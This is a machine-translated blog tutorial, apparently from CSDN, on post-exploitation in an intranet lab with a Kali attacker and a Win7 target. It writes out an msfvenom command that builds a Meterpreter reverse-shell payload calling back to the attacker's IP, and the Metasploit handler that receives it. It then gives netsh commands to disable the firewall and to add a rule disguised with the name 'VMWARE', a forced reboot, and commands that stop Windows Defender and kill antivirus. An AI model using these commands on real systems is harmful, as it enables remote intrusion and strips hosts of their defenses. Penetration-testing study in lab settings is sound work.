当前位置:网站首页>Intranet information collection of Intranet penetration (I)
Intranet information collection of Intranet penetration (I)
2022-07-06 14:07:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
03 adopt shell Turn off firewall
04 Turn off antivirus software
Intranet information collection of Intranet penetration ( Two )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
01msf rebound shell
First generate a payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe
02msf rebound shell
Configure the bounce session handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit
take payload Send it to the target machine to execute
Successful implementation
linux Can't recognize window Chinese characters can be garbled , Modify the code page (65001 It stands for UTF-8)
03 adopt shell Turn off firewall
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off ( Turn off firewall )
netsh advfirewall show allprofiles ( Check the firewall status )
Add firewall rules through policies to hide behaviors
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
Restart and take effect ( Make win7 restart ):
shutdown -r -f -t 0
04 Turn off antivirus software
close windefend
net stop windefend
Turn off antivirus software
run killav
run post/windows/manage/killav
边栏推荐
- Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
- 实验五 类和对象
- The difference between abstract classes and interfaces
- 7-1 输出2到n之间的全部素数(PTA程序设计)
- [VMware abnormal problems] problem analysis & Solutions
- 内网渗透之内网信息收集(五)
- 记一次edu,SQL注入实战
- 强化学习基础记录
- Relationship between hashcode() and equals()
- 记一次,修改密码逻辑漏洞实战
猜你喜欢
UGUI—Text
HackMyvm靶機系列(3)-visions
MATLAB打开.m文件乱码解决办法
Hackmyvm target series (1) -webmaster
7-7 7003 组合锁(PTA程序设计)
中间件漏洞复现—apache
Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
Hackmyvm target series (4) -vulny
网络基础之路由详解
Record once, modify password logic vulnerability actual combat
随机推荐
Hackmyvm target series (5) -warez
实验四 数组
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
【MySQL-表结构与完整性约束的修改(ALTER)】
Hackmyvm target series (3) -visions
HackMyvm靶机系列(7)-Tron
渗透测试学习与实战阶段分析
Mixlab unbounded community white paper officially released
MATLAB打开.m文件乱码解决办法
SQL注入
7-3 构造散列表(PTA程序设计)
【VMware异常问题】问题分析&解决办法
1. First knowledge of C language (1)
Analysis of penetration test learning and actual combat stage
[data processing of numpy and pytoch]
Get started with typescript
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
Spot gold prices rose amid volatility, and the rise in U.S. prices is likely to become the key to the future
7-4 hash table search (PTA program design)
xray與burp聯動 挖掘